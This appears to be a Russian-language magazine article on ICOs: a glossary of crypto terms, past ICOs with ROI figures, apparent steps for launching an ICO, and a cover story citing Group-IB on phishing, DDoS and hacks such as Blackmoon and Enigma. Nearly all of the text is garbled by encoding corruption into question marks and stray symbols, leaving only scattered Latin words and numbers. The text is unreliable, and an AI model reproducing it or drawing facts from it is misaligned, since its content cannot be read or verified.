?牜??????�??�,牜????�??�?????粻?�??�??�???�????�??�?????.
???� ????� ????�??� ???�?� ?????�??????�???� ????�??� ??� ???�??� ???�???
????� ?� ???�????�??.� ?� ??????,� ICO� ?� ??????�???�??� ???�??????,� ???????
????�?� ?????�????� ???????�?� ?????�???�???�?� ?� ????� ?????� ?� ???�???�?
?????�???????� ??,� ??� ???� ????� ?????,� ???�????� ?� ???� ????�???????�???
???�??�??????�?�??�???�????��??�????��??�?????�???�?????�????.
???�?????�??� ???????� ??????� ?� ???�???�????�?� ??????� ?????� ?????� ?????,
???�?�?�???�?????
??????? ??????? ????????
�
? Pre-ICO,� ???�???� ?� ????�???????�??� ???�???� ??????� ???� ????�??�??
??牜??????�???�?�.
? ICO�(Initial燙oin燨ffering),�??�?????,�????�???��???????�????�
???????� ???????,� ??� ????�???� ??????�?� ???????� ?????� ???�???�?
??�?????�??�?????�???�?????�?.
? ??�?,�???�??�???�?��??�??�???�????�?????.
? ??�??� ?� ????�?????� ??????� ???�????,� ??� ???????� ?� ???�??� ???�???�??
???�??� ????????� ?????� ????????� ???�???�?????� ??????,� ????�?,� ??????,
???�?�??�??�???�??.
? ????� ?� ??????�??????� ???????�?� ????� ????�??�??�?� ???�???� ???� ????�
?????�?????�??�???�?�??�???.
? ???�????� ?� ????�????� ????,� ???????� ??� ??????�?� ??????� ???????�?
???�???�?.
? ???�????� ?� ????�????� ???????�?� ????,� ???????�??????� ??� ???�??
???�???�??��?????�?????�?.
? ??�???� (bounty)� ?� ???�???� ???????� ??� ???�????�??� ??????� ??� ?????�
???????� ICO� (???????� ???????�??� ??� ???�??� ???�?,� ??????,� ????
??�??????��??�??).
? ??�????� (airdrop)� ?� ???�???�??� ???�???� ?????� ???????� ??????�???
???�???�?� ???�???� ???� ???????????�???�??� (�??�?粻 ?� ???�????,� ??????�
?????��????�???????�?��????�??).
? �????�?????粻(white爌aper)��???�??�???????��???�??�???�???�
?????��?�????�??�??�??�?.
? �????�??�??�?粻(roadmap)��??�?????�???�??�???�??�????�???�
?????.
? dApps��????�??�???�??�??�??�???�??.
? PoS� (Proof� of� Stake)� ?� ??????�???�???� ????� ???�????.� ???� ??????�??
???�?????�????� ???�?� ?????� ?????�??� ???????�??� ?????� ??� �?????�?�
?�??�???�?????�??�??????�????�??.
? PoW�(Proof爋f燱ork)��?????�???�???�?????.�??�???�????�??�???
?�?????�???�??�?????�????�?�????�????�????�?????�??�?????.
? ?????????�????� (smart� contract)� ?� ????�???,� ????�????�??�??
???�??�??????��??�????�??�??�?????�??�??�???�??��???�??�?.
? MVP� (minimum� viable� product)� ?� ????????�?� ???�????�??�??� ????�
????,� ????�?????� ????�?� ???�??�??,� ????�?????�?� ???� ???�??�?
??????�?,� ???�?????�??� ???�?????????� ?� ??????�??� ????????� ???�?
??�??�?????�??.
? ??�???�(escrow)��????�?,�???�?????�??�????��??�?????�?營CO
?????�???.
???????�??????
???�?� ????� ????� ???�?� ???�???�?????�?� ?� ????� ????�??????,� ??� ???�???
???�???�?�???�??.�??�??��????�?�??�????,�??????�??�???�????�???�
???�?????營CO��?????�?�??�?????�??�?.�?�??�?�??�??�???�?�???�
??????�??????�??�(?�?�???,�??�??�????),�?�??�??�??�???�??�?????�?,
?�????��??�??�?.
??�???� ???�????,� ???� ???????�??� ?� ICO� ???�???�?� ???�???� ?� ???�??�??
???� �??�?�.� ???�??� ???�???� ??????�???� ???�???� ?� ???�????� ???� (?
??� ????�??� ????� ???????� ?� ????),� ??� ???�?� ???� ?????� ????�?� ????????� ?????
????????�??�?� ???�??.� ???�???� ?� ????�???� ?� ????�??� ???�????� ????�?????�
????�?.�??�???�?�??�?�??�??�?�??�?�???�?�???,�??�???�??��????�
?????�??營CO.
?� ????�??� ???�????� ???�??� ICOStats.com.� ???� ???�???????� ???????�??
?� ???�??�??� ?� ????� ???�???�??� ICO� ??� 1� ???�?� 2018� ????.� ???????� ?� ????�
??????�??.
1.燛OS�(ROI�+117%��.06.2017).�??�??�??�????燘lock燨ne�???�??????�
??��???�?�??�???.�???�???�???�????�???�????�??�??�??�???�?????�
???�???�??�??� ???�???�??� ??� ????�??�?� ?� ???�??� ??� ???�??�???�????.
???�?????燛thereum.�??�???�??????�???�?????��???�17�???,�?????�
?????� ???�?� ?????� ???.� ??� ???� ???�?� ????�??� 350� ????�???� ???�??????.
?� ???�?� ???�???� ????�??� ?????� ???????�??� ?????� EOS� ???�??�???�???
???�?�??????�???�???�?�?�??�??�??�??�?燛TH,�??????�??�?�????
?????.
2.燬tatus�(SNT)�(ROI�+24%��.06.2017).�????�??�???�??�??�??�??�???
?�???�??�??�???.�??�????,��??????�??�????�??�?????�???�燭ON�???�
??� ??????.� ???�????�???� ??????�?� ????� ???�??� �?????�??� ???�???�????
???�????� ??� Ethereum�,� ?� ???� ???�?� ???�??�???�?� ???�??�??� Ethereum?????�
????�??.�??�?????�??�??�??�????�?爄OS��??燗ndroid.��?????�???燬ta?
tus� ???????�????� 5� ???�?????� ???�????� ?� ???�??�???� Riot.im� (?????�???�
????�??�??� ???�??�???,� ???????� ??� ???�???� ???�??�?� ?� email� ???� ??????
??????�?).� ??� ???�?� ???�????�?� 20?21� ????� ???�??� ???�??� 108� ???�?????
???�????.
3.� Bancor� (BNT)� (ROI� ?64%� ?� 12.06.2017).� ???�?????� Bancor� ????� ???�??
???�?� Filecoin� ??� ???�??�?:� ???�?� ?� 150� ???�?????� ???�????� ????� ???�???
?� ETH� ??� ???� ????� ?� ??????�?� ????� 2017� ????.� ????�?????�?� Bancor� ?????
???�?????�???� ????�???�??� ??????� ????�????� ERC20� ?� ????�?????�?� ???
???�????�??.�??�??�?????�?????�??�???�?�?�???�??????�??�??�?.
???�?� ?????� ???�???�?� ???�????� ???�??� ????�?????�????.� ????�?� ???�??
??�??�??�?�???�??�?�?�??�???�???�??????�??�??�??��???�?��????�
???�????�??�???�????�???�???�????????�??�??.�???�?,�??�??????燘an?
cor�燬tatus�???�??�???,�??????�??�???�??�????�???�燛thereum:�????�
????�??�?�?�???�??�?��???�??�??�???�???�?????�燛TH,�????�??????
???�?????��??????�??.
4.� Tezos�(XTZ)� ?� ?????� ?????�??�???�??�??� ????�???,� ???????� ????????�
????�??�??�???�??.�??�?????�??�???,�??�?�??�??�??????燛thereum.
Tezos�??�??�???�?�????�???????營CO????�????�???�???�???,�???�?
???�?????�????�??�???�?�??�????�????��??�????�??�??�??�?�??�?
???�????� ?????� ???�??� ??� 75%.� ??� ???�?????� ?????�??,� ????�???�?� Tezos
(?????�??� ????� ?????� ?� ???�??� ????�???)� ??????� ?????�???� ????.� ???� ???�?
???�?????� ???�?� ???�????� ?� ?????� ?� ????�?????�??� ??????�??�?� ???�??
?燭ezos燜oundation.
5.� Filecoin� (FIL)� ?� ???�??� ?????�?� Protocol� Labs,� ???????� ???�??� ???�????�
???�?????�???�????��??�????�?�???????????�???�??.�??�?????燜ilecoin
???�????� ?� ??????�???� ?� 10� ???????� ??� 7� ???�????,� ???�??� 135� ???�?????
???�????�???�??�???�??�?�??�??�??.��??�????�??�??�?��???爌re?
ICO�??????�?�?�???�?燗ngelList.�???�??�??????�??�???�??�??�???????�
??� ???�????� ???�??� ?� ?????�??�???�??�??� ???�??� ???� ???�????� ???�??,
????�??�??� ??� ????�??�?.� ???�???�?� ???�???� ???�??� ?� ???????� Filecoin
???�??�?????�?????,�??�??��???�?�??�??�??�????�???�????�??.
6.� Ethereum� (ETH)� (ROI� +17� 464%� ?� 22.07.2014).� ?????,� ???� ???� �???�
??????�?� ??????�?� ???�?� ???�??�?????� ??� ????.� ???� ????�????� ?� 2014� ????
???�???�??�???�????�?�??�??營CO:�????�?�??�?�??�???��??�?????
???�??� �??�?粻 ??� ???�?� 18� ???�?????� ???�????.� ????�????� ??????
????????��?????�?�15�???.��???�???�?????�?�16�??牜?????粻????�
?????� Ethereum� ???????� ?� ?????� ????� ???�??,� ?� ???� ???�?� ??�????,� ??�?????
?�?????�??,� ???�??� ???�????�?� ?????????�???�?� ?� ??�????� ???�?� ???�???�
?????�??�??�????燭he燚AO.
7.� Brave� (BAT)� (ROI� +136%� ?� 31.05.2017).� ????�????� Mozilla� ?� ???�?????
???�?� Java� Script� ????�??� ???� ??�??�??� ???�???� Brave� ???� ?� 2016� ????� (??.
???� ?????).� Brave� ????�???�?� ????�???� ????????� ??� ????�???�??� ???�???,
??�??�???�???�???�??�??�????�????�???燗dBlock.�???�?????�???,�??
????�?????�?� ????� ?????� ??????,� ?????� ?????�?� ???�?????�???� ??� ???�??
??????.� ?� ???�?????� ???�??� ?� ???????�??� ???�???� ??????�?� ??????�????
???�?�??�????�??�??�????�??��???�??�?????�????.��??�17�???
?????�?�??�????�????燘rave�??�???�????�??�???�??�?????��???�??.
??� ???�?????� ???�???� ???�???� ???�??????� ?????�????� ????� ?� ????�
????� 35� ???�?????� ???�????.� ???�?� 130� ???????� ???�?� ????�???�???
???????,�??�???�?�?�?????�???�???�?????�??,�???????�??�???�?.
8.燬torj�(ROI�+215%燾�.07.2014).�????�??�???�??�??�????�????�??�???�
?????� ???�???�?� ?� ?????�??� ????????� ?????.� ???�?????� Filecoin.� ??????
????�???�???�??�??�????�??�???????�??????��??????�??燜TP???????�
?????� FileZilla.� ??� ???�?� ???�???�??� ICO� ???�????�????� ???�???� ????�
????� 30� ???�?????� ???�????� ??� ?????� ????.� ???� ???�????� ???�???????�?
???????�???�?�????�????�?,�??燝oogle燰entures,燪ualcomm燰entures�燭ech?
stars.�??�?????�燬torj�????��?????牜??�??�??�?????�???.�??�????�???
????��???�?��???????�???�?????�?�.
9.� Aragon� (ANT)� (ROI� ?35%� c� 17.05.2017).� ????�????� ???� ???�????� ?� ????�
????� ????�?� ?????�??�???�??�??� ????�???�??.� ?????� ???�????,� ???????
??� ??????�???� ???�???� �??�??� ???�?????�???� ???�?�,� ?????� ???????�?
???????�???�??????�????��??�??�??�???,�??�??�??�????�??????�??
??????�???�?� ????�???.� 17� ???� 2017� ????� ???�?� ??� 15� ?????� ??� ????�?� ????�
?????�?�??�??�??�??��??�?????�??�????�燛TH.
10.� IOTA� (ROI� +13� 787%� c� 25.11.2015).� ???�??�??� ?????�??� ???� ???????�?
?????.�?????�?�?�?�???�??�?,��?�???�???�??�??�???�??�??�??????
Tangle.�?�????�?�???�?????�??�??????�???�??�????��??�???�???�???
???�????�?� ???�??�???�??�??,� ????� ???� ?????�??� ?� ???�????� ???�??????�
??????.��??????�??????�???�??�?�??�??�??�??�???�?��???�???��???�
??????� ???�??�??�???� ?� ?????�?.� IOTA� Foundation� ?� ???�????�??� ???�???
Microsoft.� ?� ???�????� IOTA� ????� ?????�???� ???�????� ??� ???�????�?� ???�?
????�????�????�??�??�??????.�????��??�???�???�??�???�??�?�?????�
????,� ??� ???� ?� ????�?� ?� ??????�???� ??????�??� ?????�?� ?� DDoS????�?
?�?????�??�???�?????�??�??�???�?????�??�????�??�????.
???�??�??�???�?????�??�???
? Cardano�(ANA)��????????�???????�???�????�?�??�?�???�????�????�
???� Haskell� c� ???�??�?????�??� ???�????�??� ??????�???�???.� ????�
???????�?�?????�??�???,�???�?�??�??????燛thereum.
? Einsteinium� (EMC2)� ?� ????�?????�?,� ????�????�??�??� ???� ?????�??????�
???�???�??��??�?????�??�??�??�????.
? Emercoin� (EMC)� ?� ???�??�????�??� ???�???� ???????�??� ???????�??.
???�???��13�???�??�??�???�????�??.�??????�??�???�???��??�??
?�???.
? Verge�(XVG)��???�?????�?��??�??�??????�?�??�??�????.�??????�
????� Tor� ?� I2P.� ????�?????� ???�????� ??� ????� ??????� ???�???�?� ????�??�?
�???�??�??�??�?�??�????粻(SVP).
? Decred�(DCR)��?????�??�???�?????�???�?????�?,�??????�??�????
???????�?� ????�??�??� ???� ??????� ???�???,� ???????�????�??� ?� ?????�
????.
? Komodo�(KMD)��??�??�???�?�???�????燬uperNET,�??�?????�?�???�
???� ??????� ??� atomic?swap� ???????�?,� ???�???????�????�???,� ??????�
???�???�??�??�???�??�????.
? Steemit� (STM)� ?� �???�????????�.� ????�????� ???� ??????�????� ??????�
????�??�???��????�????�????�???�???�?�???�???��????�?????.
??�??�???�???�???
????�?�????�??�???�?�???�????�???�??�???�營CO��???�??�??�?�???�
?????�??�???�???�??????�??�??�?.�???�?????�???�?�?�??�??�?????
??????�?�??�??�?????�?,�?�?�?????�??�??�?????�????�???�?????�??
???�???�???????�???�?�?�???�?.�??�??�??�?,�?�??�?�???�???�?�??
????�?�??�???�?????�??�????�牜???�?????�???????�.
? QTUM� (ROI� +1009%� c� 12.03.2017).� QTUM� Blockchain� Foundation� ????????�
???�????� ?� ???�?????� ?� ????�?� 2016� ????.� ?????� ????� ???�??� ???� ?
?????�???�????�???�??�???��????�???�??�????�???.��????�?�????�
????� ?????� ???�?????� ????�??� ???�????�????,� ?????�???� ??� ???�??� ????�
?????.� ??� ???�?� ???�????�?� ????� ???�???� 5000� BTC� ?� ???????� ??????
?????,� ???� ????� ????�???�??� ???????�??� ????�??�??� ???�???� ???�?????
?????�??�????�??�????.燪TUM�??�??�????�??�?????�??�??�??�?
????�??�??� Bitcoin� ?� Ethereum� ???� ???�??�????�??� ???�??????�???�??
???�???�????��??�???.
? Hshare�(HSR).�???燞share��??�??�???�???�??�?�??????�???�??????
???� ????????�???� ???�??�??�????.� ???????,� ???� ?????� ????�???�??
???�??�????� ????� ?????�??�???�??.� ???�????� ?� ???�???� ???�?� ????�???�
???� ?????�?� ???�???� ??� ???�????�??� ???�?,� ?� ???� ?????� ????????�?.
????�??� ???�??�??� ???�???�?� ???�??�???� ???�??�????.� ????�?????�?
???�???�?????�???燙ollin燬tar燙apital��??�??�??�???�??�????,�??????
???�????�???�???�?�???�??�?��??????�??�????�???.�??�???????
?????�????�??�???�?????燞share�????�?????�?�?燞cash.
? Elastos� (ELA)� ?� ?????�??�???�??�??� ???� ???� ???�????� ?� ???????�??
dApps.� ???�?????� EOS.� ?????�?� ???�????�????� ??????�???� ?� ??????
?�??�??.燛lastos�??�??��???�?燝3,��??�???�??????�??�?燦EO�燘it?
main.� G3� ?????�?� ???�????�???� ?� ???�?????�????� ?????.� ?� ???�?� ???�???�
???� ????�???:� Foxconn,� Alibaba,� Huawei,� AVIC� (????????�???�??� ???�????�
?????�??)��??�??.�??�?????燛LA�????�???????�?????�?�???�????,
???�?????��??�??�???燛lastos.
? NEO�(ROI�+22�4%燾�.10.2015).�??�????�?�?�???�???�????�??�????�
???�??� ????�?????�??.� ???�?????� Antshares� (???�?� ????�??�????�??
?� NEO� ???� ???�???�??� ICO)� ?� ???�????� OnChain,� ???�?� ???�??� ???�??
?�???�??�???�?????��????�??�??�????�???�????�???�?.�??�?????�
????� ???�??�???�?� ?????� 60%� ????� ????�?????????� NEO.� �????�???
Ethereum粻 ???????� ???�????�???� ?� ???�?????�????� ???.� ????� ???�?????�
????�??�??�??�??�??�???�????�???�??�??�?????�??�????????�????�
???��????�??�??????�?�??????�??�??�???�??�??�?????�???.
??????�?????
??� ???,� ??????�???� ????� ???�???� ????�???,� ??????,� ???�?� ?� ???????�?????
???� ?� ????�??� ????�???�???� ????� ???�?� (???�?,� ???�????,� ???�?)� ??� ?????,
??�???�?,�??�?????�???????,�??�?�???????�?�???�?????�?��??�????.
?????�??�?????,�??�???�???�???????營CO:
? ???�???�??�???�?????��???�??�????�??
? ???�???�??�??�??�???�???�???,�???�?�???�??�??�爓hite爌aper?
? ??�???�???�??�????�??�????
? ??�??�??�???????�???
? ????�???� ???�???�???�?� ?????� ???�???� ???�???,� ?� ?� ???�??� ???� ?????
?�????�??�??�???�????
? ??�???�?????�????�??�??�??
? ????�??�????� ???�???� ???�?????�????� ???� ????� ????�??�??� ???�???
??�???�??�????
? ??�?�?????�?�??�??營CO�?�???�?�??�????
? ????�??�???�???�?.
????�?�??�?�??�??�??�????�???�??�?�??�?��????�??�???.�????�??
???�????�?� ????�???� ???�?,� ???� ???????� ??????�???� ???�????� ???�????,
?� ?� ???�???� ????� ???� ?????�?????�??�???� ???�?� ???�????.� ???�??� ????�???
???�??� ???�?????�?,� ????�??� ???�???� ?????� ???�??� ???�??�?.� ??????� ??� ??
????� ?????� ?� ???????� ???�??�?� ???�????� ?????�??� ???�????�??,� ?� ???�??,
???�??????�??��??�??�???�???�??�??�????�???�????�????�??�????�?
???�???,��???�?�?????�?????�????�??�?�?�???.
??�?�???�??????�??�???�???�????�?,�???�????�?��??�???,�???�??
???�??� ???????�??�??.� ???�???� ??� ?????�??� ??????,� ?� ???????� ??????
???????�?????,� ?� ?????�?????�??� ???�?.� ???�????,� �??�?????� ??????�
?� �???�??�???� ??????粻 ???� ??� ??????�????�?� ????�??�?� ???�????�??
???�?????�?�????????????��?????��??�??�??????�???�???,�??�???�
?????�???� ?????� ???� ????�?.� ???�?� ??� ???�???� ???�???� ???????�????�?
???�??�?.
???�???????? ICO
??�?�?�????�????�??�??�??�?營CO,�??�?�??�???�????�?�???�??�??,
??� ???�?:� ???�???�???� ???� ???????� ???�???� ??� ???�????�?� ?� ???�??�??
???????�??� ?????� (???�?� ?????� ???�??� ?� ???� ???????).� ??� ?� ?????�?,� ????
????� ???�????�??� ???�?� ?� ???�??� ????�??� ?????�????�???,� ???�????� ?????�
???????.�??�????�???�???�??�?.
1.� ???�??�?�???.�??�??�????�??�?�?????,�?�??�????�?�?�??�??
????.� ???�??�?� ?� ???�?� ????� ?????�?� ?� ???�????�?� ????????� ????�????�
??????� ???�???� ??� ???�?,� ???� ???� ????� ????�??.� ?????� ???????� ???�???
?� ???????�?,� ???????� Bitcoin� Forum.� ???�????,� ??????� ???� ???� ???�??
??�???�??�?�??�??,�?�??�??�????�???�??.
2.� ??�??�?.� ?� ???�??�?� ??� ????� ??� ????�???�?,� ???� ???� ???� ???�?????�
?????�??.� ???�?� ????�?� ???:� ???�??�??�?,� ????�???,� ?????�???,� ????�
??????�?,� ????�??�???????�???,� ????�?????�?,� ?????�?� ??.� ???�??
??????�??�?� ?� ?????� ???�?,� ?� ????� ??????� ?????� ???�?� ?????�???,� ??
???� ????�??� ????.� ??� ????� ??� ???�?� ???�?� ?????� ????�?????�?� ?� ????�
??????�???�??.� ???�??�?,� ????� ?� ????� ?????�?� ???�????�????�??,
???????�???????�??�??�??�?營CO.�?�??�??�??�?,�??�??�?�??�?????
???�????� ????�??�???� ???????� ?� ????????� ???�??� ??� ???�??�?� ???�?
????�?????�??.� ???� ???�?� ???�???�???� ???� ???????� MVP,� ???�??�???�
??????� ????� ?� ???� ????�????.� ???� ???�?� ???�???�???� ?� ??� ???�??� ????�
????.
3.� ??�??� ??????.� ?????� �??�??�????粻 ?� �???????粻 ??????� ???�???
?� ????�???�???� ?� ???????�????� ???????� ?????�????.� ???� ???�?????�??,
???� ????�?� ???�??� ??� ?????.� ????�?� ??????� ???�?????� ?� �????�??
???�?�.
4.� ??�??�????� ???�???.� ???�??�???� ?� ???�???� ???�????�??,� ?� ???�?
???�?????�??� ??� ??????� ???.� ???�???,� ????�?,� ???????,� ??????,� ??????,
????�??� ???????,� ???�??�?,� ?????�????�??� ???�?� ???� ???�?????� ???�?
??� ?????�?????�?????� ???�?� ???�???� ????�?????�?:� ?????� ???�???� ?????
?????�???�???�??????�??�??�????�????�????�??�??????�???�???�
?????� ?????,� ????�?� ??� ???�???�????� ?????????,� ?????� ????�?????�?,
???�??� ?� ?????????.� ????�????� ?????� ???�?.� ???� ???????� ??� ???�?� ????�
????�??��?�???�????�???�??�???.
5.� ??�??�??�??� ???�????.� ???�???�?� ???????� ?????�?� ?� ???,� ???� ?� ????�
???�???�??�??�???�?�?????�?????營CO.�??�??�????�???�?????�????�
??� ?????,� ???�?� ??� ????????� ??� ???�?.� ???�????� ?� ???�??� ???�????�??
?????�??營CO�?????�???????��??�???�??�??�??營T?????�?�??�???�?
??????:� 獻CO.� ???�????,� ????�???,� ?????粻 ?� 獻CO.� ?????� ?????,� ??� ???
???粻(PDF).
6.� ????,� ???�????� ?� ???�???.� ?????�?� ??,� ????� ??????�??�?� ????
?� ?????�??� ???�??� ?� ???????�???� ?� ?????�?,� ???�????�??� ???�????
(???�?�?�?????�?!)��???�??�?????�???��??�????.
7.� ???�??� ?????� ???????�????.� ???� ???�??� ???�??� ???�????,� ????
?� ?????� ???�??� ??????� ?� ????� ???�??� ???�??� ?� ???�?� ???� ???�??� ????�
???????� ?� ?????????�???�?.� ???�?????� ?� ???,� ???� ???� ???�???�??� ?� ???
??�??�?�???????�?,�????��?????牜???�??�??�???�?�??營CO�.�??�???�
?????�?�???�???�?營CO�??�?????�?�??�?�???????��??�?????,�?????
??燚DoS��??�??�????.
8.� ??�?�???�??�??.營CO????�???,燭elegram???????,�??�???�????�??,
YouTube,� ???�?????�??�??� ???�???.� Bounty?� ?� airdrop????�????� (????
?????�?�??�?????).�??�??,�??,�??�??�????�???�???��?�??�??�??
?????.�?�???�?�??�?�??�?????�?�????�?�??�??�????��???????�
?????�?�??�?�??????�???.
9.� ??�???� ???????.� ?????�???� ????�???�??� ??????� ???�?� ???�?
?� ????????�?� Waves� ???� ???�????�??� ????�???,� ???� ???�??� ????�????
??�???�??�?�??�????�?�??�?????�??�???�???�??�????燴rCoin.�???�
???�???�??�� ??�??�???�?�燬olidity,�?????��??�??,�??�?�???????� ???�
???�???�????燛RC20.
10.� ???�?牜?�.�???�??�??營CO�??�??.�???�??�???�?�?????��???�???�
????� ????????� ??????,� DDoS� ?� ???�??� ????�????,� ?� ???�?� ???�???� ????�
????�??�??????�??�??????,�?�??�?:�??�???�???�?????�???.�?????
?????�???� ????,� ???� ??� ??????� ???�?????� ???�??,� ??� ???????� ???????
????�?.� ???� ???� ????????� ??????�?� ?� ??????� ??� ????� ??????�?,� ???�???
????????�????�?????!
????????�???
???� ?,� ????�??,� ???�?� ?????�????� ?????�??� ????�?????�?,� ??� ???�?� ???�?.
???�???�?�????牜????�??�?????粻?�??�?�?�??�???��??�?�??�??,�????�
???�?�?�??�?�???�??????????�????�?��???�??�??�????�??�????�?�?
�???粻?????????�???�???
???�?????�??�??�??�?�???�?�??�?�?????��????,�??�??�??�???�???
????�?� ????�??�?� ??� ??,� ???� ????�???� ???????� ???�????�?� ???�?,� ???�?
????????� ?????�????� ?� ???�???� ???�??�???�??� ???�?????�????� ????�???�
?????�?�???�??�??.
COVERSTORY
???�????? ??????
???
?????????
???????
????????
?????????
???????
?�????營CO
ICO
?????????�????????
???????????�???????????�?
??????�????????????????
Group?IB
?� 2017� ????� ?????�???�????�??� ???�???� ???????� 10%� ????
???????,� ???????�????�??� ?� ICO� ?????� Ethereum.� ?????
?????� ???�????� ???�?� 225� ???�?????� ???�????,� 30� ?????
???????�??� ????????� ?� ????�??� ??� 7500� ???�????.� ????�
?????�?,�??�???�?�??�??�???�?�??營CO.�??�????�???
???????� ????� ?????�???� ????�??,� ?� ?????� ??????�?????�?
?�????�??�????�??�?????.
�??� ??� ??????� ICO� ??� ????�??�???� ?� ???????� ?????�????� ???�??,� DDoS?
???�???� ?� ????�???� ?� ??� ??????� ?� ??� ??????�?????� ??????:� ????????�
????��??�??�??�?�???�??????,�??�?�?�??�???�????!?�,��???�????�
??� ???�????�?� ?� ???�????�??�?� ICO� ????� ???????,� ?????�??� ??� ???�?????�?
Blackmoon.� ???� ?????�?� ????�?????� ??� ???????� ?� ???� ?� ?� Group?IB,� ?� ??
??????�?� ?????�????� ???�?,� ???�??�???�???� ????� ???�????�??????????�
?????.
????�?� ???� ??� ????�???� ?????� Blackmoon� ???�???� ?????� 30� ???�?????
???�????.� ??� ?????� ???�??�??� ICO� ???�???�?� ??� ????�?.� ??� ????�?????�??
???� ???�?� ????�???� ??????�???� ??� ????�?� ???�????�?� ?� ????�???�???�???,
??��?????,�??????�?????�???�???�?????�??�??????��?????�??.
????�?????�?� ????�???�?� ?????�???�????�??� ???� ?� 2011� ????:� ????�?
???�?� ??????� ??????� ???????� ????�?????� ?????�????� ??????�?,� ?????�
???????�??� ???�?� ?� ???????�?,� ????????� ???�??�??� ???�?� ??� ??????�??
???????�??� ???.� ??????�??� ???�??�???� ???�??� ?� TrickBot,� Vawtrak,� Qadars,
Triba,� Marcher� ?� ????� ??????�???�?� ??� ????�?????�??� ????�??????�??
??????�??.
??�???�??�??� ?????� ?????,� ???�?????� ????�??????�??� ???�?� ???�?
??� ????�?� ???�???�????� ?????�???�????�?,� ??� ?� ???�???�???�???�??
??????.� ?� ???�???,� ?� ?????�??� ???�??� ??� ????�????�???� ????�????�???
?????�???�?�??????�?�?????�????�???�???�?燣azarus.
?� ???�??� ???� Bitcoin� ??� ???????� ???�???�???� ?????�???�??� ???�????�?
?�???????�????�???�??�??.�??????�??�??????�????營CO�????�???�?
????�???�???�???.�????�??�???�??�?????,�??????�?????�?�?????�?
?�???�??�?��?????�??????�??,�??�?�??�???????�??�???�??.
????�營CO
???�?� ?????�?� ????�?� ???�??�?� ICO,� ???� ?� ???�??� ???�???� ???�?????�???
White� Paper� (WP)� ?� ????????,� ?� ???????� ???�???�???� ???�??????� ?� ????�
??????????� ???�???.� ??� ????�?� ???�??????�???� WP� ???�???�?� ???�???,
?� ????�???�???� ????�???�?� ????�??�??,� ????�??� ??????�?� ?� ???�???� ????�
????�?� ?????�???�???� ?????�???� ?� ???�????????� ????�???�?� ?� ?????�??.
?� ????????� ??????� ????�???�?� ????� ICO,� ???�?� ????� ???�???� ??????
????????�??� ??� ????� �??�� ???�?????� ???�????� ?� ????�??????� ?� ??� ???�??
?????�??,�??�????�??�????��??�????.��??�????�??�??�?�????�???�?
ICO,� ???????�?� ??????�?� ???�???????� ????????� ??????� ???�???,� ?� ???�??
???�???�?�???�?????�?�?�???�?????�?.
??�????�?�????��???營CO�???�???�?�??????�?�???!�?????,�??�
???�?????�??�??????�?,�???�????�?????�???�?營CO.�??�???�?�??�????�
????� ???�??� ???�??� White� Paper,� ?� ???�???�????�??� ????�???�?� ??????�??
???�?�??�?????�??�????.
?????燱HITE燩APER
??�?� ??� ???�??�?????� ???�????� ????�?????????�???� ?� ???� ???�??� ??????�
?????��???�???????.�???�??�????�??�??????��???????�????�??�????�
????��????�??�??�???.�??�??�?,�??��??�??�??�???�????�?�??�???�?
WP.
???�??� ?????�?� ???� ???????�??�????� ????�??�??� ???�??,� ???�?� ????�
????�????�?�???�?�?????�???�?�?????�????�?????�??�???.�??�?�???�
?????�????�???�?:�????�?�??????�??,�?????�??�???�??�??燱hite燩aper
??�??�???�??�?,�???�???�??�??�??�????�????燝oogle燭ranslate,�??�????�
??� ???�???� ?� ???�???�?� ???�???,� ?????� ?????�??� (???�????,� ?????�???�?)
?� ?????� ????�??.� ???�??� ???�??�?� ???�??�???�???� ?� ????:� ????�???�?� ????�
????�???�??�???,�???????�??�?�?燘itcointalk.org��??�????.
???�????,�???�??�???�?�???�?燙rypto燚etectives�???�???�?,�??�???�
????�?�??�???燱i?Fi燝lobal�??�???�???��?????�?燱P�????�?� worldwi?.io.
????� ????�??????�?� ???�?????�?,� Wi?Fi� Global� ?� ???� ???�?� ????� ???�???
??????�????�??� ????�??� World� Wi?Fi.� ???� ????� ????�??�??� ?� �????�???�
?燱i?Fi燝lobal�??�?????�?�??��??�??�?????�??????�,�?�??�??�???�???�
???�??�???,�?�??�???�???�???�0�????�??�????�?爌re?ICO.
?????????????�????????
???�???�?�?�??�?�??�???�???�?�??�???�?????�??�??????�??�??�???
???�??� ?????�?,� ???�????� ???� ???�???�????�??� ?????�???�?� ????�???�?.
??� ???� ????� ??� ???�??,� ???� ?� ????� ????�?� ????????� ???????�??� ???�??� ?????�
???� ???????.� ????� ????�??�???�????�??� ??????� ??????�???�?� ??????� ???,
??� ???� ?????� ???�??�?� ?� ????�?� ??????�???�??� ???�???�??�?� ?� ??� ????�?
???�??�???�?�???�???,�?��??�??�???��??????�??.
????�?�????�??�???�??�???�??�???�???????��???�???�??�???燛nig?
ma.�?????�???�?�?????�???�??�????�??�??�????�??�?�???,�??�???
????�?????�?� ????� ???�???�??� ICO.� ???�?????� ????�?� ????�??�???�?????
????????燛nigma��??�???�?�???�????��???�??�??�????.
??�?????�?� ???�???� ?� ?????�?� ??� ???�??????�??�?� ???�?????�??�???
?????�???.�??????�???�??�????�??,�????????�?,�?�????�????�??????�
??????� ???�??� ?� ????�??� ??????� ???� ???�?� ????�????.� ???�???�?� ???�?
??????�?????�?�??�??��???�?�??�???�???�??�??�?�(??�??????�?�???
????�?????�??� ?????�?????�??).� ?????�???�?,� ???�?????� ???�????� ?� ???�??
???�????� ?� ????�????,� ???�????�??� ?� ????�?,� ??� ???�?????� ???�?.� ???�??
????�???�??�???�???�?�???�??�??�??�??�??�??�??�????�?.�??�????�
?????�?� ??????�?� ???�??� ?� ????�???� enigma.co� (????,� ??� ???????� ???�????�
??????�??�???�??????,�?�??�???�??�???�????)��??�??�??�?燬lack.
??�????� ???�??� ?� enigma.co,� ??????� ???�????�?� ???� ?????� ???�???
???????,�?????�?�?�???�燬lack��???�??�???�??�??��??�???�??�????
???�????� ??� ????�??�???� ????�?.� ???� ???� ?� ???�?� ???�??????�???� ????
?????,� ??� ???????� ????�???????� ???????�?� ??????.� ???�?� ??� ???�???� ????�
????�92燛TH��????�?�?????�?�??�?????�??�????.
???????
???�????�??�??,�??�??�???,�??�???�??�???�?��???營CO.�????燚DoS?
????� ???????�??�?� ?� ???�????� ????�?????�??,� ??????� ????�????� ?� ?????
???�???�燭elegram�燬lack,�???�?�???�?�??�????.
??�??� ????�??,� ???� ?????� ???�???�?,� ?� ??????� ???�?� ??� ???�?� ICO.
????�??????�????�???�??:�??�?????�?�??�????�??�??�??�??�???�???
???????��???????�????�??�?�???.
